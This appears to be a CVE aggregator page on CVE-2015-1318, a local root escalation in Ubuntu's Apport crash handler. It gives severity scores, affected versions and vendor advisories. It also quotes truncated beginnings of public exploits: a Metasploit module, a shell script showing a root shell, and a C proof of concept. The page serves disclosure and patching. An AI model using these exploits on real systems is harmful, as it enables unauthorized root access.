CVE-2015-1318
published 2015-04-17CVE-2015-1318: The crash reporting feature in Apport 2.13 through 2.17.x before 2.17.1 allows local users to gain privileges via a crafted usr/share/apport/apport file in a…
PriorityP340high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
4.08%
89.4th percentile
The crash reporting feature in Apport 2.13 through 2.17.x before 2.17.1 allows local users to gain privileges via a crafted usr/share/apport/apport file in a namespace (container).
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | — | — |
| apport_project | apport | >= 0 < 2.14.1-0ubuntu3.9 | 2.14.1-0ubuntu3.9 |
CVSS provenance
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
osv7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Apport vulnerability
vendor_ubuntu·2015-04-14
CVE-2015-1318 Apport vulnerability
Title: Apport vulnerability
Summary: Apport could be tricked into running programs as an administrator.
Stéphane Graber and Tavis Ormandy independently discovered that Apport
incorrectly handled the crash reporting feature. A local attacker could use
this issue to gain elevated privileges.
Instructions: In general, a standard system update will make all the necessary changes.
GHSA
GHSA-cpww-w9jx-qp3p: The crash reporting feature in Apport 2
ghsa_unreviewed·2022-05-14
CVE-2015-1318 [HIGH] GHSA-cpww-w9jx-qp3p: The crash reporting feature in Apport 2
The crash reporting feature in Apport 2.13 through 2.17.x before 2.17.1 allows local users to gain privileges via a crafted usr/share/apport/apport file in a namespace (container).
OSV
CVE-2015-1318: The crash reporting feature in Apport 2
osv·2015-04-14·CVSS 7.2
CVE-2015-1318 [HIGH] CVE-2015-1318: The crash reporting feature in Apport 2
The crash reporting feature in Apport 2.13 through 2.17.x before 2.17.1 allows local users to gain privileges via a crafted usr/share/apport/apport file in a namespace (container).
No detection rules found.
Exploit-DB
Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit)
exploitdb·2018-02-05
CVE-2015-1318 Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit)
Apport/ABRT - 'chroot' Local Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Apport / ABRT chroot Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges on Linux systems by
invoking the default coredump handler inside a namespace ("container").
Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are
vulnerable, due to a feature which allows forwarding reports to
a container's Apport by changing the root directory before loading
the crash report, causing 'usr/share/apport/apport' within the crashed
task's directory to be executed.
Similarly, Fedora is vulnerable when the kernel crash handler is
Exploit-DB
Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation
exploitdb·2015-04-17·CVSS 7.2
CVE-2015-1318 [HIGH] Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation
Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation
---
#!/bin/sh
#
# CVE-2015-1318
#
# Reference: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758
#
# Example:
#
# % uname -a
# Linux maggie 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
#
# % lsb_release -a
# No LSB modules are available.
# Distributor ID: Ubuntu
# Description: Ubuntu 14.04.2 LTS
# Release: 14.04
# Codename: trusty
#
# % dpkg -l | grep '^ii apport ' | awk -F ' ' '{ print $2 " " $3 }'
# apport 2.14.1-0ubuntu3.8
#
# % id
# uid=1000(ricardo) gid=1000(ricardo) groups=1000(ricardo) (...)
#
# % ./apport.sh
# pwned-4.3# id
# uid=1000(ricardo) gid=1000(ricardo) euid=0(root) groups=0(root) (...)
# pwned-4.3# exit
TEMPDIR=$(mktemp -d)
cd ${TEMPDIR}
cp /bin/busy
Exploit-DB
Apport/Abrt (Ubuntu / Fedora) - Local Privilege Escalation
exploitdb·2015-04-14·CVSS 7.2
CVE-2015-1862 [HIGH] Apport/Abrt (Ubuntu / Fedora) - Local Privilege Escalation
Apport/Abrt (Ubuntu / Fedora) - Local Privilege Escalation
---
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
# warning this file must be compiled with -static
//
// Apport/Abrt Vulnerability Demo Exploit.
//
// Apport: CVE-2015-1318
// Abrt: CVE-2015-1862
//
// -- [email protected], April 2015.
//
// $ gcc -static newpid.c
// $ ./a.out
// uid=0(root) gid=0(root) groups=0(root)
// sh-4.3# exit
// exit
//
// Hint: To get libc.a,
// yum install glibc-static or apt-get install libc6-dev
//
int main(int argc, char **argv)
{
int status;
Elf32_Phdr *hdr;
pid_t wrapper;
pid_t init;
pid_t subprocess;
unsigned i;
// Verify this is a static executable by checking the program headers for a
// d
Metasploit
Apport / ABRT chroot Privilege Escalation
metasploit
Apport / ABRT chroot Privilege Escalation
Apport / ABRT chroot Privilege Escalation
This module attempts to gain root privileges on Linux systems by invoking the default coredump handler inside a namespace ("container"). Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are vulnerable, due to a feature which allows forwarding reports to a container's Apport by changing the root directory before loading the crash report, causing `usr/share/apport/apport` within the crashed task's directory to be executed. Similarly, Fedora is vulnerable when the kernel crash handler is configured to change root directory before executing ABRT, causing `usr/libexec/abrt-hook-ccpp` within the crashed task's directory to be executed. In both instances, the crash handler does not drop privileges, resulting in code execution as root. This mod
No writeups or analysis indexed.
http://www.osvdb.org/120803http://www.ubuntu.com/usn/USN-2569-1https://bugs.launchpad.net/ubuntu/%2Bsource/apport/%2Bbug/1438758https://launchpad.net/apport/trunk/2.17.1https://www.exploit-db.com/exploits/36782/https://www.exploit-db.com/exploits/43971/http://seclists.org/fulldisclosure/2025/Jun/9http://www.osvdb.org/120803http://www.ubuntu.com/usn/USN-2569-1https://bugs.launchpad.net/ubuntu/%2Bsource/apport/%2Bbug/1438758https://launchpad.net/apport/trunk/2.17.1https://www.exploit-db.com/exploits/36782/https://www.exploit-db.com/exploits/43971/
2015-04-17
Published